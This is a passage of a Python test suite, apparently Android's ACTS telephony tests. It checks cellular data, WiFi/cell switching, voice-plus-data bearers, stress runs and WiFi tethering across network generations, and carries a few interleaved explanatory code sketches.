"test_tethering_4g_to_5gwifi",
"test_tethering_4g_to_2gwifi",
"test_tethering_4g_to_2gwifi_2clients",
"test_toggle_apm_during_active_wifi_tethering",
"test_toggle_data_during_active_wifi_tethering",
"test_disable_wifi_tethering_resume_connected_wifi",
"test_tethering_wifi_ssid_quotes",
"test_tethering_wifi_no_password",
"test_tethering_wifi_password_escaping_characters",
"test_tethering_wifi_ssid",
"test_tethering_wifi_password",
"test_tethering_wifi_volte_call",
"test_tethering_wifi_csfb_call",
"test_tethering_wifi_3g_call",
"test_tethering_wifi_reboot",
"test_connect_wifi_start_tethering_wifi_reboot",
"test_connect_wifi_reboot_start_tethering_wifi",
"test_tethering_wifi_screen_off_enable_doze_mode",
# stress tests
"test_4g_stress",
"test_3g_stress",
"test_lte_multi_bearer_stress",
"test_wcdma_multi_bearer_stress",
"test_tethering_4g_to_2gwifi_stress",)
self.stress_test_number = int(self.user_params["stress_test_number"])
self.wifi_network_ssid = self.user_params["wifi_network_ssid"]
try:
self.wifi_network_pass = self.user_params["wifi_network_pass"]
except KeyError:
self.wifi_network_pass = None
@TelephonyBaseTest.tel_test_wrap
def test_airplane_mode(self):
""" Test airplane mode basic on Phone and Live SIM.
Ensure phone attach, data on, WiFi off and verify Internet.
Turn on airplane mode to make sure detach.
Turn off airplane mode to make sure attach.
Verify Internet connection.
Returns:
True if pass; False if fail.
"""
return airplane_mode_test(self.log, self.android_devices[0])
@TelephonyBaseTest.tel_test_wrap
def test_lte_wifi_switching(self):
"""Test data connection network switching when phone camped on LTE.
Ensure phone is camped on LTE
Ensure WiFi can connect to live network,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_4G)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_wifi_switching(self):
"""Test data connection network switching when phone camped on WCDMA.
Ensure phone is camped on WCDMA
Ensure WiFi can connect to live network,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_3G)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_wifi_switching(self):
"""Test data connection network switching when phone camped on GSM.
Ensure phone is camped on GSM
Ensure WiFi can connect to live network,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_2G)
@TelephonyBaseTest.tel_test_wrap
def test_lte_multi_bearer(self):
"""Test LTE data connection before call and in call. (VoLTE call)
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in LTE, verify Internet.
Initiate a voice call. verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
if not phone_setup_volte(self.log, self.android_devices[0]):
self.log.error("Failed to setup VoLTE")
return False
return self._test_data_connectivity_multi_bearer(GEN_4G)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_multi_bearer(self):
"""Test WCDMA data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in WCDMA, verify Internet.
Initiate a voice call. verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_3G)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_multi_bearer_mo(self):
"""Test gsm data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in GSM, verify Internet.
Initiate a MO voice call. Verify there is no Internet during call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_2G,
False, DIRECTION_MOBILE_ORIGINATED)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_multi_bearer_mt(self):
"""Test gsm data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in GSM, verify Internet.
Initiate a MT voice call. Verify there is no Internet during call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_2G,
False, DIRECTION_MOBILE_TERMINATED)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_multi_bearer_stress(self):
"""Stress Test WCDMA data connection before call and in call.
This is a stress test for "test_wcdma_multi_bearer".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_wcdma_multi_bearer():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
@TelephonyBaseTest.tel_test_wrap
def test_lte_multi_bearer_stress(self):
"""Stress Test LTE data connection before call and in call. (VoLTE call)
This is a stress test for "test_lte_multi_bearer".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_lte_multi_bearer():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
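Both stress wrappers end with the same tally-and-threshold check; factored out as a standalone sketch (not part of the test class):

```python
def meets_success_rate(success_count, fail_count, minimum_rate=0.95):
    """Return True when the observed pass ratio reaches minimum_rate."""
    total = success_count + fail_count
    # guard against division by zero when no iterations ran
    return total > 0 and success_count / total >= minimum_rate
```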
def _test_data_connectivity_multi_bearer(self, nw_gen,
simultaneous_voice_data=True,
call_direction=DIRECTION_MOBILE_ORIGINATED):
"""Test data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in <nw_gen>, verify Internet.
Initiate a voice call.
if simultaneous_voice_data is True, then:
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
if simultaneous_voice_data is False, then:
Verify Internet is not available during voice call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
class _LocalException(Exception):
pass
ad_list = [self.android_devices[0], self.android_devices[1]]
ensure_phones_idle(self.log, ad_list)
if not ensure_network_generation_for_subscription(self.log,
self.android_devices[0],
self.android_devices[0].droid.subscriptionGetDefaultDataSubId(),
nw_gen, MAX_WAIT_TIME_NW_SELECTION,
NETWORK_SERVICE_DATA):
self.log.error("Device failed to reselect in {}s.".format(
MAX_WAIT_TIME_NW_SELECTION))
return False
if not wait_for_voice_attach_for_subscription(
self.log, self.android_devices[0], self.android_devices[
0].droid.subscriptionGetDefaultVoiceSubId(),
MAX_WAIT_TIME_NW_SELECTION):
return False
self.log.info("Step1 WiFi is Off, Data is on Cell.")
toggle_airplane_mode(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if (not wait_for_cell_data_connection(self.log,
self.android_devices[0], True) or
not verify_http_connection(self.log, self.android_devices[0])):
self.log.error("Data not available on cell")
return False
try:
self.log.info("Step2 Initiate call and accept.")
if call_direction == DIRECTION_MOBILE_ORIGINATED:
ad_caller = self.android_devices[0]
ad_callee = self.android_devices[1]
else:
ad_caller = self.android_devices[1]
ad_callee = self.android_devices[0]
if not call_setup_teardown(self.log, ad_caller, ad_callee, None,
None, None):
self.log.error("Failed to Establish {} Voice Call".format(
call_direction))
return False
if simultaneous_voice_data:
self.log.info("Step3 Verify internet.")
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
self.log.info("Step4 Turn off data and verify not connected.")
self.android_devices[0].droid.telephonyToggleDataConnection(False)
if not wait_for_cell_data_connection(
self.log, self.android_devices[0], False):
raise _LocalException("Failed to Disable Cellular Data")
if verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Accessible when Disabled")
self.log.info("Step5 Re-enable data.")
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if not wait_for_cell_data_connection(
self.log, self.android_devices[0], True):
raise _LocalException("Failed to Re-Enable Cellular Data")
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
else:
self.log.info("Step3 Verify no Internet and skip steps 4-5.")
if verify_http_connection(self.log, self.android_devices[0],
retry=0):
raise _LocalException("Internet Accessible.")
self.log.info("Step6 Verify phones still in call and Hang up.")
if not verify_incall_state(
self.log,
[self.android_devices[0], self.android_devices[1]], True):
return False
if not hangup_call(self.log, self.android_devices[0]):
self.log.error("Failed to hang up call")
return False
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
except _LocalException as e:
self.log.error(str(e))
try:
hangup_call(self.log, self.android_devices[0])
self.android_devices[0].droid.telephonyToggleDataConnection(
True)
except Exception:
pass
return False
return True
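The flow above funnels every failed verification step through a local exception class so a single cleanup path runs before returning False. A minimal, self-contained sketch of that idiom (the `run_steps` helper and step names are illustrative, not part of the ACTS harness):

```python
class _LocalException(Exception):
    """Raised by a failed step to jump to the shared cleanup path."""
    pass

def run_steps(steps):
    """Run boolean step callables in order.

    On the first failure, raise _LocalException, perform cleanup
    (e.g. hang up the call, re-enable data), and return False.
    """
    try:
        for name, step in steps:
            if not step():
                raise _LocalException("Step failed: {}".format(name))
    except _LocalException:
        # Cleanup would go here; failures in cleanup are ignored.
        return False
    return True

# The second step fails, so cleanup runs and False is returned.
result = run_steps([("verify internet", lambda: True),
                    ("disable data", lambda: False)])
```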
@TelephonyBaseTest.tel_test_wrap
def test_2g(self):
"""Test data connection in 2G.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 2G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_2G)
@TelephonyBaseTest.tel_test_wrap
def test_2g_wifi_not_associated(self):
"""Test data connection in 2G.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 2G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_2G)
@TelephonyBaseTest.tel_test_wrap
def test_3g(self):
"""Test data connection in 3G.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 3G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_3G)
@TelephonyBaseTest.tel_test_wrap
def test_3g_wifi_not_associated(self):
"""Test data connection in 3G.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 3G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_3G)
@TelephonyBaseTest.tel_test_wrap
def test_4g(self):
"""Test data connection in 4g.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 4g.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_4G)
@TelephonyBaseTest.tel_test_wrap
def test_4g_wifi_not_associated(self):
"""Test data connection in 4g.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 4g.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_4G)
@TelephonyBaseTest.tel_test_wrap
def test_3g_stress(self):
"""Stress Test data connection in 3G.
This is a stress test for "test_3g".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True if stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0],
False)
if data_connectivity_single_bearer(
self.log, self.android_devices[0], RAT_3G):
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
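The stress loop's pass/fail bookkeeping reduces to a rate comparison against a threshold. A hedged sketch of that arithmetic (`meets_success_rate` is an illustrative helper, not an ACTS API; the constant mirrors the one above):

```python
MINIMUM_SUCCESS_RATE = .95

def meets_success_rate(success_count, fail_count,
                       minimum=MINIMUM_SUCCESS_RATE):
    """Return True when the observed pass rate reaches the threshold."""
    total = success_count + fail_count
    if total == 0:
        return False  # no iterations ran; treat as failure
    return success_count / total >= minimum

print(meets_success_rate(96, 4))   # 0.96 >= 0.95
print(meets_success_rate(94, 6))   # 0.94 <  0.95
```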
@TelephonyBaseTest.tel_test_wrap
def test_4g_stress(self):
"""Stress Test data connection in 4g.
This is a stress test for "test_4g".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True if stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0],
False)
if data_connectivity_single_bearer(
self.log, self.android_devices[0], RAT_4G):
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
def _test_setup_tethering(self, ads, network_generation=None):
"""Pre setup steps for WiFi tethering test.
Ensure all ads are idle.
Ensure tethering provider:
turn off APM, turn off WiFi, turn on Data,
has an Internet connection, and has no active WiFi tethering.
Returns:
True if success.
False if failed.
"""
ensure_phones_idle(self.log, ads)
if network_generation is not None:
if not ensure_network_generation_for_subscription(self.log,
self.android_devices[0],
self.android_devices[0].droid.subscriptionGetDefaultDataSubId(),
network_generation, MAX_WAIT_TIME_NW_SELECTION,
NETWORK_SERVICE_DATA):
self.log.error("Device failed to reselect in {}s.".format(
MAX_WAIT_TIME_NW_SELECTION))
return False
self.log.info("Airplane Off, WiFi Off, Data On.")
toggle_airplane_mode(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if not wait_for_cell_data_connection(self.log, self.android_devices[0],
True):
self.log.error("Failed to enable data connection.")
return False
self.log.info("Verify internet")
if not verify_http_connection(self.log, self.android_devices[0]):
self.log.error("Data not available on cell.")
return False
# Turn off active SoftAP if any.
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi(self):
"""WiFi Tethering test: LTE to WiFi 2.4G Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_5gwifi(self):
"""WiFi Tethering test: LTE to WiFi 5G Tethering
1. DUT in LTE mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_3g_to_2gwifi(self):
"""WiFi Tethering test: 3G to WiFi 2.4G Tethering
1. DUT in 3G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_3g_to_5gwifi(self):
"""WiFi Tethering test: 3G to WiFi 5G Tethering
1. DUT in 3G mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi_2clients(self):
"""WiFi Tethering test: LTE to WiFi 2.4G Tethering, with multiple clients
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB and PhoneC disable data, connect to DUT's softAP
4. Verify Internet access on DUT, PhoneB and PhoneC
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1], ads[2]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_2g_to_2gwifi(self):
"""WiFi Tethering test: 2G to WiFi 2.4G Tethering
1. DUT in 2G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_2G):
self.log.error("Verify 2G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_2g_to_5gwifi(self):
"""WiFi Tethering test: 2G to WiFi 5G Tethering
1. DUT in 2G mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_2G):
self.log.error("Verify 2G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_disable_wifi_tethering_resume_connected_wifi(self):
"""WiFi Tethering test: WiFI connected to 2.4G network,
start (LTE) 2.4G WiFi tethering, then stop tethering
1. DUT in LTE mode, idle. WiFi connected to 2.4G Network
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Disable WiFi Tethering on DUT.
6. Verify DUT automatically reconnects to the previous WiFi network
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
self.log.info("Connect WiFi.")
if not ensure_wifi_connected(self.log, ads[0], self.wifi_network_ssid,
self.wifi_network_pass):
self.log.error("WiFi connect fail.")
return False
self.log.info("Start WiFi Tethering.")
if not wifi_tethering_setup_teardown(self.log,
ads[0],
[ads[1]],
check_interval=10,
check_iteration=2):
self.log.error("WiFi Tethering failed.")
return False
if (not wait_for_wifi_data_connection(self.log, ads[0], True) or
not verify_http_connection(self.log, ads[0])):
self.log.error("Provider data did not return to WiFi")
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_toggle_data_during_active_wifi_tethering(self):
"""WiFi Tethering test: Toggle Data during active WiFi Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Disable Data on DUT, verify PhoneB is still connected to WiFi but has no Internet access.
6. Enable Data on DUT, verify PhoneB is still connected to WiFi and has Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
ssid = rand_ascii_str(10)
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False,
ssid=ssid):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info(
"Disable Data on Provider, verify no data on Client.")
ads[0].droid.telephonyToggleDataConnection(False)
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if verify_http_connection(self.log, ads[0]):
self.log.error("Disable data on provider failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
if wifi_info[WifiEnums.SSID_KEY] != ssid:
self.log.error("WiFi error. Info: {}".format(wifi_info))
return False
if verify_http_connection(self.log, ads[1]):
self.log.error("Client should not have Internet connection.")
return False
self.log.info(
"Enable Data on Provider, verify data available on Client.")
ads[0].droid.telephonyToggleDataConnection(True)
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Enable data on provider failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
if wifi_info[WifiEnums.SSID_KEY] != ssid:
self.log.error("WiFi error. Info: {}".format(wifi_info))
return False
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client has no Internet connection.")
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
# Invalid Live Test. Can't rely on the result of this test with live network.
# Network may decide not to change the RAT when data connection is active.
@TelephonyBaseTest.tel_test_wrap
def test_change_rat_during_active_wifi_tethering_lte_to_3g(self):
"""WiFi Tethering test: Change Cellular Data RAT generation from LTE to 3G,
during active WiFi Tethering.
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Change DUT Cellular Data RAT generation from LTE to 3G.
6. Verify both DUT and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Provider change RAT from LTE to 3G.")
if not ensure_network_generation(
self.log,
ads[0],
RAT_3G,
voice_or_data=NETWORK_SERVICE_DATA,
toggle_apm_after_setting=False):
self.log.error("Provider failed to reselect to 3G.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Data not available on Provider.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
if not tethering_check_internet_connection(self.log, ads[0],
[ads[1]], 10, 5):
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
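Note the `return False` inside `finally` in the cleanup above: in Python, a `return` in a `finally` block replaces any exception raised in the `try` body, so a cleanup failure here would mask the original error. A small self-contained demonstration of that language behavior:

```python
def cleanup_masks_exception():
    """Show that a return in finally suppresses an in-flight exception."""
    try:
        raise RuntimeError("failure inside try")
    finally:
        # This return swallows the RuntimeError above; the caller
        # only ever sees False, never the exception.
        return False

print(cleanup_masks_exception())  # False, no exception propagates
```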
# Invalid Live Test. Can't rely on the result of this test with live network.
# Network may decide not to change the RAT when data connection is active.
@TelephonyBaseTest.tel_test_wrap
def test_change_rat_during_active_wifi_tethering_3g_to_lte(self):
"""WiFi Tethering test: Change Cellular Data RAT generation from 3G to LTE,
during active WiFi Tethering.
1. DUT in 3G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Change DUT Cellular Data RAT generation from 3G to LTE.
6. Verify both DUT and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Provider change RAT from 3G to 4G.")
if not ensure_network_generation(
self.log,
ads[0],
RAT_4G,
voice_or_data=NETWORK_SERVICE_DATA,
toggle_apm_after_setting=False):
self.log.error("Provider failed to reselect to 4G.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Data not available on Provider.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
